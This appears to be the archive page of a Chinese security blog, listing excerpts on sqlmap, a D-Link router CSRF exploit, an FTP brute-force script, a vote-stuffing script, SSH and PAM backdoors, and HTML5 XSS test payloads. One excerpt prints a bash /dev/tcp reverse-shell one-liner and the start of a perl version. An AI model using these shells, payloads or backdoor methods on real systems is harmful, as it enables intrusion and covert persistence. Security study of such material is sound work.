2014
02-15

sqlmap使用帮助文档(二)

注入 测试参数 参数：-p,--skip sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如： -p "id,user-anget" 当你使用--level的值很大但是有个.... Read More >

2014
02-15

sqlmap使用帮助文档(一)

当给sqlmap这么一个url的时候，它会： 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择，读取哪些数据   sqlmap支持五种不同的注入模式： 1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行.... Read More >

2014
01-22

D-link路由器CSRF漏洞利用详解

1，介绍 本文的目的是展示CSRF漏洞的危害，以D-link的DIR-600路由器（硬件版本：BX，固件版本：2.16）的CSRF漏洞为例。 D-link的CSRF漏洞已经是公开的，本文将详细描述一下整个D-link CSRF漏洞的利用，如何通过CSRF漏洞实现远程管理访问D-link路由器。 2，CSRF漏洞说明 如果某些request请求中没有csrf  token或不.... Read More >

2014
01-20

svn信息泄漏探测工具(新手学python)

快放假了，比较闲，写了个svn信息泄漏的探测工具，严格意义上说和wwwscan功能差不多，判断是否存在/.svn/等目录，贴上代码： #coding:utf-8 import sys import httplib2 if len(sys.argv)<2: print 'Usag:'+"svnscan.py"+" host.... Read More >

2014
01-10

Python实现Awvs自动化扫描

最近再做一个python的小程序，主要功能是实现Acuenetix Web Vulnerability Scanner的自动化扫描，批量对一些目标进行扫描，然后对扫描结果写入mysql数据库。写这篇文章，分享一下一些思路。 程序主要分三个功能模块，Url下载、批量扫描、结果入库， 有一个另外独立的程序，在流量镜像服务器上进行抓包，抓取Http协议的包，然后对包进行筛选处理，保留一些带有.... Read More >

2013
11-19

FTP帐号密码暴力破解小工具(新手学python)

群内一童鞋写的ftp暴力破解小工具，主要用到了FTP模块,功能很简单，不大实用，还有很多需要改进的地方，贴上代码： from ftplib import FTP import time def ConnectFtp(ftpAddress,user,password): for myaddress in ftpAddress: f=FTP(myaddress) .... Read More >

2013
11-19

vbs获取系统硬件信息小脚本

工作需要，需要获取win服务器的硬件信息，提交给一api 接口，最后用vbs实现了功能，主要是用到了WMI 发包是调用curl.exe来实现的，代码如下：   REM '获取IP地址' REM '判断DNS是否为空，判断IP地址开头是否为10或192' strComputer = "." Set objWM.... Read More >

2013
11-07

python自动投票（新手学python）

前段时间看到黑马发起的2013年度创业家评选的网络投票活动，发现没有对单IP投票次数进行限制，可以无限次的投！ 公司的大BOSS居然也在候选名单中，准备给大BOSS刷点票，写了个python自动投票脚本！主要用了httplib模块自动提交post请求. 贴上代码： #!/usr/bin/env python #coding=utf8 import httplib, urlli.... Read More >

2013
10-21

反弹shell的十种姿势

转载自 Wooyun Zone 作者:XSSER bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成，所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >

2013
09-17

IT人爱心项目三：募捐助学–结束

很早以前发起的爱心项目三：募捐助学，因为中间有学生的暑假，导致一直到最近才将募捐所得的资金邮寄给那边的老师。 在lsh4ck,疯子,西毒,sky的响应支持下，才让该项目能顺利进行，非常感谢几位！ 加上我自己捐的，一共募捐了600元，下面是老师传过来的照片： 有时候能够排除各.... Read More >

2013
09-10

Linux系统安全之ssh后门

  1.ssh -V #查看当前的ssh版本信息 #OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2.查找ssh的配置文件 一般都在/etc/ssh中 3.备份原来的文件的time 将/etc/ssh下的文件的备份 假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old.... Read More >

2013
09-10

linux系统安全之pam后门

本文由Sky原创投稿,请尊重劳动成果，转载注明出处！ 测试环境：Centos 6.2 64位 0x01:查询本机的PAM版本 下载地址： http://www.linux-pam.org/library/ https://fedorahosted.org/rel.... Read More >

2013
08-30

CoreText API Bug:可导致IOS6.1.3/OS X 10.8.4系统崩溃

今天是高富帅和白富美们不淡定的一天，IOS/Mac OS系统爆出了一个Bug,可以导致各种IM类型的APP崩溃。 该Bug是由于WebKit浏览器引擎导致的，受影响的系统有Mac OS 10.8和Ios 6,低于Ios 6和Ios 7、低于Mac OS10.8的版本不受该Bug影响。 任何使用了苹果的CoreText API渲染文本的浏览器或者应用程序都会受此Bug的影响，攻击字符串是.... Read More >

2013
08-16

Python实现自动登录网站

一段新手学习python的小程序，在圣哥指点下完成，主要功能是实现自动登录基调网络，并且完成打开WWW页面全屏显示的功能。 主要用到了Python Pamie模块，安装该模块需要先安装win32api模块，下面贴上具体的代码： ''' Created on 2013-8-15 @author: Nx4dm1n ''' #-.... Read More >

2013
08-11

浅谈内容欺骗漏洞

内容欺骗漏洞是指攻击者可以通过修改网页源代码，让访问者觉得是该功能或者该站点是可信合法的，来达到欺骗用户的目的。内容欺骗往往利用web服务的用户和组织之间建立的信任关系，意图是欺骗用户，达到钓鱼获取用户敏感信息的目的。 OWASP也将也被称为内容注射或者虚拟污损，内容欺骗漏洞攻击一般是和社会工.... Read More >

2013
07-10

HTML5下的XSS测试代码

国外某童鞋收集整理的针对HTML5的 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert(1)”>.... Read More >